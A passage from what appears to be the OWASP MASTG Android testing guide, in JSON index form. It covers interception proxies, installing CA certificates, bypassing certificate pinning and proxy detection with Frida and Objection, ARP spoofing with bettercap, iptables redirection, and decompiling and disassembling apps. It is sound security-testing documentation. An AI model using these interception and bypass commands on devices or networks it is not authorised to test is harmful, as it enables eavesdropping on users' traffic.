"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#http","title":"HTTP","text":"FCM uses the ports 5228, 5229, and 5230 for HTTP communication. Usually, only port 5228 is used.
$ echo \"\nrdr pass inet proto tcp from any to any port 5228-> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5229 -> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5230 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
For XMPP communication, FCM uses ports 5235 (Production) and 5236 (Testing).
$ echo \"\nrdr pass inet proto tcp from any to any port 5235-> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5236 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#intercepting-the-requests","title":"Intercepting the Requests","text":"The interception proxy must listen to the port specified in the port forwarding rule above (port 8080).
Start the app and trigger a function that uses FCM. You should see HTTP messages in your interception proxy.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#end-to-end-encryption-for-push-notifications","title":"End-to-End Encryption for Push Notifications","text":"As an additional layer of security, push notifications can be encrypted by using Capillary. Capillary is a library to simplify the sending of end-to-end (E2E) encrypted push messages from Java-based application servers to Android clients.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/","title":"Setting Up an Interception Proxy","text":"Several tools support the network analysis of applications that rely on the HTTP(S) protocol. The most important tools are the so-called interception proxies; OWASP ZAP and Burp Suite Professional are the most famous. An interception proxy gives the tester a man-in-the-middle position. This position is useful for reading and/or modifying all app requests and endpoint responses, which are used for testing Authorization, Session, Management, etc.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#interception-proxy-for-a-virtual-device","title":"Interception Proxy for a Virtual Device","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#setting-up-a-web-proxy-on-an-android-virtual-device-avd","title":"Setting Up a Web Proxy on an Android Virtual Device (AVD)","text":"The following procedure, which works on the Android emulator that ships with Android Studio 3.x, is for setting up an HTTP proxy on the emulator:
Configure the HTTP proxy in the emulator settings:
HTTP and HTTPS requests should now be routed over the proxy on the host computer. If not, try toggling airplane mode off and on.
A proxy for an AVD can also be configured on the command line by using the emulator command when starting an AVD. The following example starts the AVD Nexus_5X_API_23 and sets a proxy to 127.0.0.1 and port 8080.
emulator @Nexus_5X_API_23 -http-proxy 127.0.0.1:8080\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#installing-a-ca-certificate-on-the-virtual-device","title":"Installing a CA Certificate on the Virtual Device","text":"An easy way to install a CA certificate is to push the certificate to the device and add it to the certificate store via Security Settings. For example, you can install the PortSwigger (Burp) CA certificate as follows:
cacert.der
by clicking the \"CA Certificate\" button..der
to .cer
.Push the file to the emulator:
adb push cacert.cer /sdcard/\n
Navigate to Settings -> Security -> Install from SD Card.
cacert.cer
.You should then be prompted to confirm installation of the certificate (you'll also be asked to set a device PIN if you haven't already).
This installs the certificate in the user certificate store (tested on Genymotion VM). In order to place the certificate in the root store you can perform the following steps:
adb root
and adb shell
./data/misc/user/0/cacerts-added/
./system/etc/security/cacerts/
.For Android 7.0 (API level 24) and above follow the same procedure described in the \"Bypassing the Network Security Configuration\" section.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#interception-proxy-for-a-physical-device","title":"Interception Proxy for a Physical Device","text":"The available network setup options must be evaluated first. The mobile device used for testing and the host computer running the interception proxy must be connected to the same Wi-Fi network. Use either an (existing) access point or create an ad-hoc wireless network.
Once you've configured the network and established a connection between the testing host computer and the mobile device, several steps remain.
NET::ERR_CERT_VALIDITY_TOO_LONG
errors, if the leaf certificate happens to have a validity extending a certain time (39 months in case of Chrome). This happens if the default Burp CA certificate is used, since the Burp Suite issues leaf certificates with the same validity as its CA certificate. You can circumvent this by creating your own CA certificate and import it to the Burp Suite, as explained in this blog post.After completing these steps and starting the app, the requests should show up in the interception proxy.
A video of setting up OWASP ZAP with an Android device can be found on secure.force.com.
A few other differences: from Android 8.0 (API level 26) onward, the network behavior of the app changes when HTTPS traffic is tunneled through another connection. And from Android 9 (API level 28) onward, the SSLSocket and SSLEngine will behave a little bit different in terms of error handling when something goes wrong during the handshakes.
As mentioned before, starting with Android 7.0 (API level 24), the Android OS will no longer trust user CA certificates by default, unless specified in the application. In the following section, we explain two methods to bypass this Android security control.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#bypassing-the-network-security-configuration","title":"Bypassing the Network Security Configuration","text":"In this section we will present several methods to bypass Android's Network Security Configuration.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#adding-custom-user-certificates-to-the-network-security-configuration","title":"Adding Custom User Certificates to the Network Security Configuration","text":"There are different configurations available for the Network Security Configuration to add non-system Certificate Authorities via the src attribute:
<certificates src=[\"system\" | \"user\" | \"raw resource\"]\n overridePins=[\"true\" | \"false\"] />\n
Each certificate can be one of the following:
\"raw resource\"
is an ID pointing to a file containing X.509 certificates\"system\"
for the pre-installed system CA certificates\"user\"
for user-added CA certificatesThe CA certificates trusted by the app can be a system trusted CA as well as a user CA. Usually you will have added the certificate of your interception proxy already as additional CA in Android. Therefore we will focus on the \"user\" setting, which allows you to force the Android app to trust this certificate with the following Network Security Configuration below:
<network-security-config>\n <base-config>\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n </base-config>\n</network-security-config>\n
To implement this new setting you must follow the steps below:
Decompile the app using a decompilation tool like apktool:
apktool d <filename>.apk\n
Make the application trust user certificates by creating a Network Security Configuration that includes <certificates src=\"user\" />
as explained above
Go into the directory created by apktool when decompiling the app and rebuild the app using apktool. The new apk will be in the dist
directory.
apktool b\n
You need to repackage the app, as explained in the \"Repackaging\" section of the \"Reverse Engineering and Tampering\" chapter. For more details on the repackaging process you can also consult the Android developer documentation, that explains the process as a whole.
Note that even if this method is quite simple its major drawback is that you have to apply this operation for each application you want to evaluate which is additional overhead for testing.
Bear in mind that if the app you are testing has additional hardening measures, like verification of the app signature you might not be able to start the app anymore. As part of the repackaging you will sign the app with your own key and therefore the signature changes will result in triggering such checks that might lead to immediate termination of the app. You would need to identify and disable such checks either by patching them during repackaging of the app or dynamic instrumentation through Frida.
There is a python script available that automates the steps described above called Android-CertKiller. This Python script can extract the APK from an installed Android app, decompile it, make it debuggable, add a new Network Security Configuration that allows user certificates, builds and signs the new APK and installs the new APK with the SSL Bypass.
python main.py -w\n\n***************************************\nAndroid CertKiller (v0.1)\n***************************************\n\nCertKiller Wizard Mode\n---------------------------------\nList of devices attached\n4200dc72f27bc44d device\n\n---------------------------------\n\nEnter Application Package Name: nsc.android.mstg.owasp.org.android_nsc\n\nPackage: /data/app/nsc.android.mstg.owasp.org.android_nsc-1/base.apk\n\nI. Initiating APK extraction from device\n complete\n------------------------------\nI. Decompiling\n complete\n------------------------------\nI. Applying SSL bypass\n complete\n------------------------------\nI. Building New APK\n complete\n------------------------------\nI. Signing APK\n complete\n------------------------------\n\nWould you like to install the APK on your device(y/N): y\n------------------------------------\n Installing Unpinned APK\n------------------------------\nFinished\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#adding-the-proxys-certificate-among-system-trusted-cas-using-magisk","title":"Adding the Proxy's certificate among system trusted CAs using Magisk","text":"In order to avoid the obligation of configuring the Network Security Configuration for each application, we must force the device to accept the proxy's certificate as one of the systems trusted certificates.
There is a Magisk module that will automatically add all user-installed CA certificates to the list of system trusted CAs.
Download the latest version of the module at the Github Release page, push the downloaded file over to the device and import it in the Magisk Manager's \"Module\" view by clicking on the +
button. Finally, a restart is required by Magisk Manager to let changes take effect.
From now on, any CA certificate that is installed by the user via \"Settings\", \"Security & location\", \"Encryption & credentials\", \"Install from storage\" (location may differ) is automatically pushed into the system's trust store by this Magisk module. Reboot and verify that the CA certificate is listed in \"Settings\", \"Security & location\", \"Encryption & credentials\", \"Trusted credentials\" (location may differ).
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#manually-adding-the-proxys-certificate-among-system-trusted-cas","title":"Manually adding the Proxy's certificate among system trusted CAs","text":"Alternatively, you can follow the following steps manually in order to achieve the same result:
mount -o rw,remount /system
. If this command fails, try running the following command mount -o rw,remount -t ext4 /system
Prepare the proxy's CA certificates to match system certificates format. Export the proxy's certificates in der
format (this is the default format in Burp Suite) then run the following commands:
$ openssl x509 -inform DER -in cacert.der -out cacert.pem\n$ openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1\nmv cacert.pem <hash>.0\n
Finally, copy the <hash>.0
file into the directory /system/etc/security/cacerts and then run the following command:
chmod 644 <hash>.0\n
By following the steps described above you allow any application to trust the proxy's certificate, which allows you to intercept its traffic, unless of course the application uses SSL pinning.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#potential-obstacles","title":"Potential Obstacles","text":"Applications often implement security controls that make it more difficult to perform a security review of the application, such as root detection and certificate pinning. Ideally, you would acquire both a version of the application that has these controls enabled, and one where the controls are disabled. This allows you to analyze the proper implementation of the controls, after which you can continue with the less-secure version for further tests.
Of course, this is not always possible, and you may need to perform a black-box assessment on an application where all security controls are enabled. The section below shows you how you can circumvent certificate pinning for different applications.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#client-isolation-in-wireless-networks","title":"Client Isolation in Wireless Networks","text":"Once you have setup an interception proxy and have a MITM position you might still not be able to see anything. This might be due to restrictions in the app (see next section) but can also be due to so called client isolation in the Wi-Fi that you are connected to.
Wireless Client Isolation is a security feature that prevents wireless clients from communicating with one another. This feature is useful for guest and BYOD SSIDs adding a level of security to limit attacks and threats between devices connected to the wireless networks.
What to do if the Wi-Fi we need for testing has client isolation?
You can configure the proxy on your Android device to point to 127.0.0.1:8080, connect your phone via USB to your host computer and use adb to make a reverse port forwarding:
adb reverse tcp:8080 tcp:8080\n
Once you have done this all proxy traffic on your Android phone will be going to port 8080 on 127.0.0.1 and it will be redirected via adb to 127.0.0.1:8080 on your host computer and you will see now the traffic in your Burp. With this trick you are able to test and intercept traffic also in Wi-Fis that have client isolation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#non-proxy-aware-apps","title":"Non-Proxy Aware Apps","text":"Once you have setup an interception proxy and have a MITM position you might still not be able to see anything. This is mainly due to the following reasons:
In both scenarios you would need additional steps to finally being able to see the traffic. In the sections below we are describing two different solutions, bettercap and iptables.
You could also use an access point that is under your control to redirect the traffic, but this would require additional hardware and we focus for now on software solutions.
For both solutions you need to activate \"Support invisible proxying\" in Burp, in Proxy Tab/Options/Edit Interface.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#iptables","title":"iptables","text":"You can use iptables on the Android device to redirect all traffic to your interception proxy. The following command would redirect port 80 to your proxy running on port 8080
iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination <Your-Proxy-IP>:8080\n
Verify the iptables settings and check the IP and port.
$ iptables -t nat -L\nChain PREROUTING (policy ACCEPT)\ntarget prot opt source destination\n\nChain INPUT (policy ACCEPT)\ntarget prot opt source destination\n\nChain OUTPUT (policy ACCEPT)\ntarget prot opt source destination\nDNAT tcp -- anywhere anywhere tcp dpt:5288 to:<Your-Proxy-IP>:8080\n\nChain POSTROUTING (policy ACCEPT)\ntarget prot opt source destination\n\nChain natctrl_nat_POSTROUTING (0 references)\ntarget prot opt source destination\n\nChain oem_nat_pre (0 references)\ntarget prot opt source destination\n
In case you want to reset the iptables configuration you can flush the rules:
iptables -t nat -F\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#bettercap","title":"bettercap","text":"Read the chapter \"Testing Network Communication\" and the test case \"Simulating a Man-in-the-Middle Attack\" for further preparation and instructions for running bettercap.
The host computer where you run your proxy and the Android device must be connected to the same wireless network. Start bettercap with the following command, replacing the IP address below (X.X.X.X) with the IP address of your Android device.
$ sudo bettercap -eval \"set arp.spoof.targets X.X.X.X; arp.spoof on; set arp.spoof.internal true; set arp.spoof.fullduplex true;\"\nbettercap v2.22 (built for darwin amd64 with go1.12.1) [type 'help' for a list of commands]\n\n[19:21:39] [sys.log] [inf] arp.spoof enabling forwarding\n[19:21:39] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#proxy-detection","title":"Proxy Detection","text":"Some mobile apps are trying to detect if a proxy is set. If that's the case they will assume that this is malicious and will not work properly.
In order to bypass such a protection mechanism you could either setup bettercap or configure iptables that don't need a proxy setup on your Android phone. A third option we didn't mention before and that is applicable in this scenario is using Frida. It is possible on Android to detect if a system proxy is set by querying the ProxyInfo
class and check the getHost() and getPort() methods. There might be various other methods to achieve the same task and you would need to decompile the APK in order to identify the actual class and method name.
Below you can find boiler plate source code for a Frida script that will help you to overload the method (in this case called isProxySet) that is verifying if a proxy is set and will always return false. Even if a proxy is now configured the app will now think that none is set as the function returns false.
setTimeout(function(){\n Java.perform(function (){\n console.log(\"[*] Script loaded\")\n\n var Proxy = Java.use(\"<package-name>.<class-name>\")\n\n Proxy.isProxySet.overload().implementation = function() {\n console.log(\"[*] isProxySet function invoked\")\n return false\n }\n });\n});\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/","title":"Bypassing Certificate Pinning","text":"Some applications will implement SSL Pinning, which prevents the application from accepting your intercepting certificate as a valid certificate. This means that you will not be able to monitor the traffic between the application and the server.
For most applications, certificate pinning can be bypassed within seconds, but only if the app uses the API functions that are covered by these tools. If the app is implementing SSL Pinning with a custom framework or library, the SSL Pinning must be manually patched and deactivated, which can be time-consuming.
This section describes various ways to bypass SSL Pinning and gives guidance about what you should do when the existing tools don't help.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypassing-methods","title":"Bypassing Methods","text":"There are several ways to bypass certificate pinning for a black box test, depending on the frameworks available on the device:
android sslpinning disable
command.If you have a rooted device with frida-server installed, you can bypass SSL pinning by running the following Objection command (repackage your app if you're using a non-rooted device):
android sslpinning disable\n
Here's an example of the output:
See also Objection's help on Disabling SSL Pinning for Android for further information and inspect the pinning.ts file to understand how the bypass works.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypass-custom-certificate-pinning-statically","title":"Bypass Custom Certificate Pinning Statically","text":"Somewhere in the application, both the endpoint and the certificate (or its hash) must be defined. After decompiling the application, you can search for:
grep -ri \"sha256\\|sha1\" ./smali
. Replace the identified hashes with the hash of your proxy's CA. Alternatively, if the hash is accompanied by a domain name, you can try modifying the domain name to a non-existing domain so that the original domain is not pinned. This works well on obfuscated OkHTTP implementations.find ./assets -type f \\( -iname \\*.cer -o -iname \\*.crt \\)
. Replace these files with your proxy's certificates, making sure they are in the correct format.find ./ -type f \\( -iname \\*.jks -o -iname \\*.bks \\)
. Add your proxy's certificates to the truststore and make sure they are in the correct format.Keep in mind that an app might contain files without extension. The most common file locations are assets
and res
directories, which should also be investigated.
As an example, let's say that you find an application which uses a BKS (BouncyCastle) truststore and it's stored in the file res/raw/truststore.bks
. To bypass SSL Pinning you need to add your proxy's certificate to the truststore with the command line tool keytool
. Keytool
comes with the Java SDK and the following values are needed to execute the command:
To add your proxy's certificate use the following command:
keytool -importcert -v -trustcacerts -file proxy.cer -alias aliascert -keystore \"res/raw/truststore.bks\" -provider org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath \"providerpath/bcprov-jdk15on-164.jar\" -storetype BKS -storepass password\n
To list certificates in the BKS truststore use the following command:
keytool -list -keystore \"res/raw/truststore.bks\" -provider org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath \"providerpath/bcprov-jdk15on-164.jar\" -storetype BKS -storepass password\n
After making these modifications, repackage the application using apktool and install it on your device.
If the application uses native libraries to implement network communication, further reverse engineering is needed. An example of such an approach can be found in the blog post Identifying the SSL Pinning logic in smali code, patching it, and reassembling the APK
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypass-custom-certificate-pinning-dynamically","title":"Bypass Custom Certificate Pinning Dynamically","text":"Bypassing the pinning logic dynamically makes it more convenient as there is no need to bypass any integrity checks and it's much faster to perform trial & error attempts.
Finding the correct method to hook is typically the hardest part and can take quite some time depending on the level of obfuscation. As developers typically reuse existing libraries, it is a good approach to search for strings and license files that identify the used library. Once the library has been identified, examine the non-obfuscated source code to find methods which are suited for dynamic instrumentation.
As an example, let's say that you find an application which uses an obfuscated OkHTTP3 library. The documentation shows that the CertificatePinner.Builder
class is responsible for adding pins for specific domains. If you can modify the arguments to the Builder.add method, you can change the hashes to the correct hashes belonging to your certificate. Finding the correct method can be done in either two ways, as explained in this blog post by Jeroen Beckers:
For the Builder.add method, you can find the possible methods by running the following grep command: grep -ri java/lang/String;\\[Ljava/lang/String;)L ./
This command will search for all methods that take a string and a variable list of strings as arguments, and return a complex object. Depending on the size of the application, this may have one or multiple matches in the code.
Hook each method with Frida and print the arguments. One of them will print out a domain name and a certificate hash, after which you can modify the arguments to circumvent the implemented pinning.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0013/","title":"Reverse Engineering Android Apps","text":"Android's openness makes it a favorable environment for reverse engineers, offering big advantages that are not available with iOS. Because Android is open-source, you can study its source code at the Android Open Source Project (AOSP) and modify the OS and its standard tools any way you want. Even on standard retail devices, it is possible to do things like activating developer mode and sideloading apps without jumping through many hoops. From the powerful tools shipping with the SDK to the wide range of available reverse engineering tools, there's a lot of niceties to make your life easier.
However, there are also a few Android-specific challenges. For example, you'll need to deal with both Java bytecode and native code. Java Native Interface (JNI) is sometimes deliberately used to confuse reverse engineers (to be fair, there are legitimate reasons for using JNI, such as improving performance or supporting legacy code). Developers sometimes use the native layer to \"hide\" data and functionality, and they may structure their apps such that execution frequently jumps between the two layers.
You'll need at least a working knowledge of both the Java-based Android environment and the Linux OS and Kernel, on which Android is based. You'll also need the right toolset to deal with both the bytecode running on the Java virtual machine and the native code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0014/","title":"Static Analysis on Android","text":"Static analysis is a technique used to examine and evaluate the source code of a mobile application without executing it. This method is instrumental in identifying potential security vulnerabilities, coding errors, and compliance issues. Static analysis tools can scan the entire codebase automatically, making them a valuable asset for developers and security auditors.
Two good examples of static analysis tools are grep and semgrep. However, there are many other tools available, and you should choose the one that best fits your needs.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0014/#example-using-grep-for-manifest-analysis-in-android-apps","title":"Example: Using grep for Manifest Analysis in Android Apps","text":"One simple yet effective use of static analysis is using the grep
command-line tool to inspect the AndroidManifest.xml
file of an Android app. For example, you can extract the minimum SDK version (which indicates the lowest version of Android the app supports) with the following grep
command:
grep 'android:minSdkVersion' AndroidManifest.xml\n
This command searches for the android:minSdkVersion
attribute within the manifest file. Ensuring a higher minSdkVersion
can reduce security risks, as older versions of Android may not include the latest security features and fixes.
semgrep is a more advanced tool that can be used for pattern matching in code. It's particularly useful for identifying complex coding patterns that might lead to security vulnerabilities. For example, to find instances where a deterministic seed is used with the SecureRandom
class (which can compromise the randomness and thus the security), you can use a semgrep rule like:
rules:\n - id: insecure-securerandom-seed\n patterns:\n - pattern: new SecureRandom($SEED)\n - pattern-not: $SEED = null\n message: \"Using a deterministic seed with SecureRandom. Consider using a more secure seed.\"\n languages: [java]\n severity: WARNING\n
This rule will flag any instances in the code where SecureRandom
is initialized with a specific seed, excluding cases where the seed is null (which implies a secure random seed).
TBD
"},{"location":"MASTG/techniques/android/MASTG-TECH-0016/","title":"Disassembling Code to Smali","text":"If you want to inspect the app's smali code (instead of Java), you can open your APK in Android Studio by clicking Profile or debug APK from the \"Welcome screen\" (even if you don't intend to debug it you can take a look at the smali code).
Alternatively you can use apktool to extract and disassemble resources directly from the APK archive and disassemble Java bytecode to smali. apktool allows you to reassemble the package, which is useful for patching the app or applying changes to e.g. the Android Manifest.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0017/","title":"Decompiling Java Code","text":"In Android app security testing, if the application is based solely on Java and doesn't have any native code (C/C++ code), the reverse engineering process is relatively easy and recovers (decompiles) almost all the source code. In those cases, black-box testing (with access to the compiled binary, but not the original source code) can get pretty close to white-box testing.
Nevertheless, if the code has been purposefully obfuscated (or some tool-breaking anti-decompilation tricks have been applied), the reverse engineering process may be very time-consuming and unproductive. This also applies to applications that contain native code. They can still be reverse engineered, but the process is not automated and requires knowledge of low-level details.
If you want to look directly into Java source code on a GUI, simply open your APK using jadx or Bytecode Viewer.
Android decompilers go one step further and attempt to convert Android bytecode back into Java source code, making it more human-readable. Fortunately, Java decompilers generally handle Android bytecode well. The above mentioned tools embed, and sometimes even combine, popular free decompilers such as:
Alternatively you can use the APKLab extension for Visual Studio Code or run apkx on your APK or use the exported files from the previous tools to open the reversed source code on your preferred IDE.
In the following example we'll be using UnCrackable App for Android Level 1. First, let's install the app on a device or emulator and run it to see what the crackme is about.
Seems like we're expected to find some kind of secret code!
We're looking for a secret string stored somewhere inside the app, so the next step is to look inside. First, unzip the APK file (unzip UnCrackable-Level1.apk -d UnCrackable-Level1
) and look at the content. In the standard setup, all the Java bytecode and app data is in the file classes.dex
in the app root directory (UnCrackable-Level1/
). This file conforms to the Dalvik Executable Format (DEX), an Android-specific way of packaging Java programs. Most Java decompilers take plain class files or JARs as input, so you need to convert the classes.dex file into a JAR first. You can do this with dex2jar
or enjarify
.
Once you have a JAR file, you can use any free decompiler to produce Java code. In this example, we'll use the CFR decompiler. CFR releases are available on the author's website. CFR was released under an MIT license, so you can use it freely even though its source code is not available.
The easiest way to run CFR is through apkx, which also packages dex2jar
and automates extraction, conversion, and decompilation. Run it on the APK and you should find the decompiled sources in the directory Uncrackable-Level1/src
. To view the sources, a simple text editor (preferably with syntax highlighting) is fine, but loading the code into a Java IDE makes navigation easier. Let's import the code into IntelliJ, which also provides on-device debugging functionality.
Open IntelliJ and select \"Android\" as the project type in the left tab of the \"New Project\" dialog. Enter \"Uncrackable1\" as the application name and \"vantagepoint.sg\" as the company name. This results in the package name \"sg.vantagepoint.uncrackable1\", which matches the original package name. Using a matching package name is important if you want to attach the debugger to the running app later on because IntelliJ uses the package name to identify the correct process.
In the next dialog, pick any API number; you don't actually want to compile the project, so the number doesn't matter. Click \"next\" and choose \"Add no Activity\", then click \"finish\".
Once you have created the project, expand the \"1: Project\" view on the left and navigate to the folder app/src/main/java
. Right-click and delete the default package \"sg.vantagepoint.uncrackable1\" created by IntelliJ.
Now, open the Uncrackable-Level1/src
directory in a file browser and drag the sg
directory into the now empty Java
folder in the IntelliJ project view (hold the \"alt\" key to copy the folder instead of moving it).
You'll end up with a structure that resembles the original Android Studio project from which the app was built.
See the section \"Reviewing Decompiled Java Code\" below to learn on how to proceed when inspecting the decompiled Java code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0018/","title":"Disassembling Native Code","text":"Dalvik and ART both support the Java Native Interface (JNI), which defines a way for Java code to interact with native code written in C/C++. As on other Linux-based operating systems, native code is packaged (compiled) into ELF dynamic libraries (*.so), which the Android app loads at runtime via the System.load
method. However, instead of relying on widely used C libraries (such as glibc), Android binaries are built against a custom libc named Bionic. Bionic adds support for important Android-specific services such as system properties and logging, and it is not fully POSIX-compatible.
When reversing an Android application containing native code, we need to understand a couple of data structures related to the JNI bridge between Java and native code. From the reversing perspective, we need to be aware of two key data structures: JavaVM
and JNIEnv
. Both of them are pointers to pointers to function tables:
JavaVM
provides an interface to invoke functions for creating and destroying a JavaVM. Android allows only one JavaVM
per process and is not really relevant for our reversing purposes.JNIEnv
provides access to most of the JNI functions which are accessible at a fixed offset through the JNIEnv
pointer. This JNIEnv
pointer is the first parameter passed to every JNI function. We will discuss this concept again with the help of an example later in this chapter.It is worth highlighting that analyzing disassembled native code is much more challenging than disassembled Java code. When reversing the native code in an Android application we will need a disassembler.
In the next example we'll reverse the HelloWorld-JNI.apk from the OWASP MASTG repository. Installing and running it in an emulator or Android device is optional.
wget https://github.com/OWASP/owasp-mastg/raw/master/Samples/Android/01_HelloWorld-JNI/HelloWord-JNI.apk\n
This app is not exactly spectacular, all it does is show a label with the text \"Hello from C++\". This is the app Android generates by default when you create a new project with C/C++ support, which is just enough to show the basic principles of JNI calls.
Decompile the APK with apkx
.
$ apkx HelloWord-JNI.apk\nExtracting HelloWord-JNI.apk to HelloWord-JNI\nConverting: classes.dex -> classes.jar (dex2jar)\ndex2jar HelloWord-JNI/classes.dex -> HelloWord-JNI/classes.jar\nDecompiling to HelloWord-JNI/src (cfr)\n
This extracts the source code into the HelloWord-JNI/src
directory. The main activity is found in the file HelloWord-JNI/src/sg/vantagepoint/helloworldjni/MainActivity.java
. The \"Hello World\" text view is populated in the onCreate
method:
public class MainActivity\nextends AppCompatActivity {\n static {\n System.loadLibrary(\"native-lib\");\n }\n\n @Override\n protected void onCreate(Bundle bundle) {\n super.onCreate(bundle);\n this.setContentView(2130968603);\n ((TextView)this.findViewById(2131427422)).setText((CharSequence)this. \\\n stringFromJNI());\n }\n\n public native String stringFromJNI();\n}\n
Note the declaration of public native String stringFromJNI
at the bottom. The keyword \"native\" tells the Java compiler that this method is implemented in a native language. The corresponding function is resolved during runtime, but only if a native library that exports a global symbol with the expected signature is loaded (signatures comprise a package name, class name, and method name). In this example, this requirement is satisfied by the following C or C++ function:
JNIEXPORT jstring JNICALL Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI(JNIEnv *env, jobject)\n
So where is the native implementation of this function? If you look into the \"lib\" directory of the unzipped APK archive, you'll see several subdirectories (one per supported processor architecture), each of them containing a version of the native library, in this case libnative-lib.so
. When System.loadLibrary
is called, the loader selects the correct version based on the device that the app is running on. Before moving ahead, pay attention to the first parameter passed to the current JNI function. It is the same JNIEnv
data structure which was discussed earlier in this section.
Following the naming convention mentioned above, you can expect the library to export a symbol called Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI
. On Linux systems, you can retrieve the list of symbols with readelf
(included in GNU binutils) or nm
. Do this on macOS with the greadelf
tool, which you can install via Macports or Homebrew. The following example uses greadelf
:
$ greadelf -W -s libnative-lib.so | grep Java\n 3: 00004e49 112 FUNC GLOBAL DEFAULT 11 Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI\n
You can also see this using radare2's rabin2:
$ rabin2 -s HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so | grep -i Java\n003 0x00000e78 0x00000e78 GLOBAL FUNC 16 Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
This is the native function that eventually gets executed when the stringFromJNI
native method is called.
To disassemble the code, you can load libnative-lib.so
into any disassembler that understands ELF binaries (i.e., any disassembler). If the app ships with binaries for different architectures, you can theoretically pick the architecture you're most familiar with, as long as it is compatible with the disassembler. Each version is compiled from the same source and implements the same functionality. However, if you're planning to debug the library on a live device later, it's usually wise to pick an ARM build.
To support both older and newer ARM processors, Android apps ship with multiple ARM builds compiled for different Application Binary Interface (ABI) versions. The ABI defines how the application's machine code is supposed to interact with the system at runtime. The following ABIs are supported:
Most disassemblers can handle any of those architectures. Below, we'll be viewing the armeabi-v7a version (located in HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so
) in radare2 and in IDA Pro. See the section \"Reviewing Disassembled Native Code\" below to learn on how to proceed when inspecting the disassembled native code.
To open the file in radare2 you only have to run r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so
. The chapter \"Android Basic Security Testing\" already introduced radare2. Remember that you can use the flag -A
to run the aaa
command right after loading the binary in order to analyze all referenced code.
$ r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Check for objc references\n[x] Check for vtables\n[x] Finding xrefs in noncode section with anal.in=io.maps\n[x] Analyze value pointers (aav)\n[x] Value from 0x00000000 to 0x00001dcf (aav)\n[x] 0x00000000-0x00001dcf in 0x0-0x1dcf (aav)\n[x] Emulate code to find computed references (aae)\n[x] Type matching analysis for all functions (aaft)\n[x] Use -AA or aaaa to perform additional experimental analysis.\n -- Print the contents of the current block with the 'p' command\n[0x00000e3c]>\n
Note that for bigger binaries, starting directly with the flag -A
might be very time consuming as well as unnecessary. Depending on your purpose, you may open the binary without this option and then apply a less complex analysis like aa
or a more concrete type of analysis such as the ones offered in aa
(basic analysis of all functions) or aac
(analyze function calls). Remember to always type ?
to get the help or attach it to commands to see even more command or options. For example, if you enter aa?
you'll get the full list of analysis commands.
[0x00001760]> aa?\nUsage: aa[0*?] # see also 'af' and 'afna'\n| aa alias for 'af@@ sym.*;af@entry0;afva'\n| aaa[?] autoname functions after aa (see afna)\n| aab abb across bin.sections.rx\n| aac [len] analyze function calls (af @@ `pi len~call[1]`)\n| aac* [len] flag function calls without performing a complete analysis\n| aad [len] analyze data references to code\n| aae [len] ([addr]) analyze references with ESIL (optionally to address)\n| aaf[e|t] analyze all functions (e anal.hasnext=1;afr @@c:isq) (aafe=aef@@f)\n| aaF [sym*] set anal.in=block for all the spaces between flags matching glob\n| aaFa [sym*] same as aaF but uses af/a2f instead of af+/afb+ (slower but more accurate)\n| aai[j] show info of all analysis parameters\n| aan autoname functions that either start with fcn.* or sym.func.*\n| aang find function and symbol names from golang binaries\n| aao analyze all objc references\n| aap find and analyze function preludes\n| aar[?] [len] analyze len bytes of instructions for references\n| aas [len] analyze symbols (af @@= `isq~[0]`)\n| aaS analyze all flags starting with sym. (af @@ sym.*)\n| aat [len] analyze all consecutive functions in section\n| aaT [len] analyze code after trap-sleds\n| aau [len] list mem areas (larger than len bytes) not covered by functions\n| aav [sat] find values referencing a specific section or map\n
There is a thing that is worth noticing about radare2 vs other disassemblers like e.g. IDA Pro. The following quote from this article of radare2's blog (https://radareorg.github.io/blog/) offers a good summary.
